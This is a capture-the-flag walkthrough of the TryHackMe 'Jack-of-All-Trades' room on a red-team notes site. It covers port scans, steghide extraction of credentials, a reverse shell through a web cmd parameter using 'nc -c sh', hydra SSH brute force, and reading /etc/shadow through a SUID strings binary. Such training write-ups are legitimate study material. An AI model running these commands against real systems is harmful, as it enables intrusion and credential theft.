🔥
Red Team
  • Welcome
    • About
  • Methodologies & Resources
    • Enumeration
    • Gaining Access
    • Payloads
    • Cheat Sheets
      • Transferring Files
      • Privilege Escalation
        • Linux
          • Scripts
            • Bruteforce su
        • Windows
          • Recon Scripts
      • LFI / RFI
      • Buffer Overflow
        • Fuzzers
      • Command Injection
      • Credential Harvesting
      • Password Attacks
      • Command Injection
      • SQL Injection
      • Bypass File Upload
      • Burp
      • Static Binaries
      • File Info Gathering & Script Abuse
      • Credential Gathering & Cracking
      • Other Cheat sheets
      • Lateral Movement and Pivoting
      • Vulnerabilities Seen
      • Active Directory
      • Web
      • Enumeration & Brute Force
  • Walkthroughs
    • Tryhackme
      • Hydra
        • Container Vulnerabilities
      • Blue
      • Steel Mountain
      • Alfred
      • HackPark
      • Game Zone
      • Skynet
      • Daily Bugle
      • Overpass 2 - Hacked
      • Relevant
      • Internal
      • Buffer Overflow Prep
      • File Inclusion
      • Brainstorm
      • Gatekeeper
      • Brainpan 1
      • Upload Vulnerabilities
      • Pickle Rick
      • John The Ripper
      • Attacktive Directory
      • Weaponization
      • Attacking Kerberos
      • Post-Exploitation Basics
      • Common Linux Privesc
      • Linux PrivEsc
      • Basic Pentesting
      • Net Sec Challenge
      • Linux Privilege Escalation
      • Windows Privilege Escalation
      • Password Attacks
      • The Lay of the land
      • Enumeration
      • Windows Local Persistence
      • Lateral Movement and Pivoting
      • Bypassing UAC
      • Hacking with PowerShell
      • Corp
      • Mr Robot CTF
      • Retro
      • Breaching Active Directory
      • Enumerating Active Directory
      • Exploiting Active Directory
      • Persisting Active Directory
      • Credentials Harvesting
      • Red Team Capstone Challenge
      • Crack the hash
      • Ice
      • Bounty Hunter
      • Agent Sudo
      • LazyAdmin
      • Wgel CTF
      • Cyborg
      • Year of the Rabbit
      • Brute It
      • Lian_Yu
      • ToolsRus
      • Chill Hack
      • Bolt
      • source
      • Brooklyn Nine Nine
      • Anthem
      • GamingServer
      • Chocolate Factory
      • Archangel
      • Easy Peasy
      • ColddBox: Easy
      • Fowsniff CTF
      • Blaster
      • The Cod Caper
      • SQL Injection Lab
      • Agent T
      • Avengers Blog
      • Mustacchio
      • Team
      • Tech_Supp0rt: 1
      • Gallery
      • Jack-of-All-Trades
      • Mother's Secret
      • Traverse
      • Anonforce
      • Dav
      • Thompson
      • VulnNet: Internal
      • Library
      • Flatline
      • b3dr0ck
      • Lesson Learned?
      • Opacity
      • Plotted-TMS
      • GLITCH
      • Hacker vs. Hacker
      • Valley
      • magician
      • HeartBleed
      • Expose
      • dogcat
      • Madeye's Castle
        • Old Madeye's Castle
      • Startup
      • Overpass
      • 0day
      • Mindgames
      • HaskHell
      • Annie
      • ContainMe
      • Develpy
      • Watcher
      • Spring
      • Anonymous
      • Boiler CTF
      • Wonderland
      • Blog
      • Biohazard
      • UltraTech
      • The Marketplace
      • CMesS
      • FINISH - Linux Agency
      • Road
      • Tokyo Ghoul
      • GoldenEye
      • Oh My WebServer
      • HA Joker CTF
      • Ollie
      • Looking Glass
      • VulnNet
      • Olympus
      • Wekor
      • Bookstore
      • biteme
      • CMSpit
      • Peak Hill
      • SQHell
      • Zeno
      • ffuf
      • Burp Suite: Repeater
      • Burp Suite: Intruder
      • Burp Suite: Other Modules
      • Burp Suite: Extensions
      • Linux PrivEsc Arena
      • tomghost
      • The Docker Rodeo
      • Empline
      • The Great Escape
      • VulnNet: Active
      • battery
      • Hip Flask
      • TryHack3M: Bricks Heist
      • One Piece
      • Inferno
      • Kitty
      • AVenger
      • Umbrella
      • Stealth
      • Athena
      • Napping
      • CyberLens
      • Obscure
      • Wordpress: CVE-2021-29447
      • File Inclusion, Path Traversal
      • NoSQL Injection
      • Advanced SQL Injection
      • XXE Injection
      • LDAP Injection
      • XSS
      • DOM-Based Attacks
      • CSRF
      • TryHack3M: Sch3Ma D3Mon
      • PrintNightmare
      • GitLab CVE-2023-7028
      • Python for Pentesters
      • PowerShell for Pentesters
      • Web Enumeration
      • Holo
      • Linux: Local Enumeration
      • Linux Process Analysis
      • Windows Network Analysis
      • Bypass
      • CVE-2023-38408
      • SQLMAP
      • Deja Vu
      • SSTI
      • DNS Manipulation
      • Linux Backdoors
      • Linux Modules
      • RustScan
      • Windows PrivEsc
      • Windows PrivEsc Arena
      • Wreath
Powered by GitBook
On this page
  • Initial Scan
  • Scan all ports
  • TCP/22 - HTTP
  • PSPY
  1. Walkthroughs
  2. Tryhackme

Jack-of-All-Trades

PreviousGalleryNextMother's Secret

Last updated 10 months ago

Room Link:

Initial Scan

For some reason they switched port 22 with http site and 80 with ssh

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/22 - HTTP

gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Had to all the override to see the site on port 22 in firefox

There is a stegosaurus picture on the home page so it is hinting that there's something in one of the pictures, eventually we find jackinthebox username and password in one of the pictures.

Kali

steghide extract -sf stego.jpg 
Password: u?WtKSraq

steghide extract -sf header.jpg  
Password: u?WtKSraq

If you run a command like this you can't see the results unless you view the source.

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali

nc -lvnp 1337

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

In the home directory there is a password list, it's small enough so I copied and pasted into a file on Kali.

Kali

hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh

Kali

ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@

PSPY

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

cd /tmp
wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32

Strings as the SUID-bit set which means we can run it against files we normally wouldn't be able to read. I tried getting roots password but it was taking too long.

Victim

find / -perm -u=s -type f 2> /dev/null 
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd

Kali

unshadow passwd shadow > passwords.txt 
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I just ended up using strings to read the root.txt

Kali

/usr/bin/strings /root/root.txt
https://tryhackme.com/room/jackofalltrades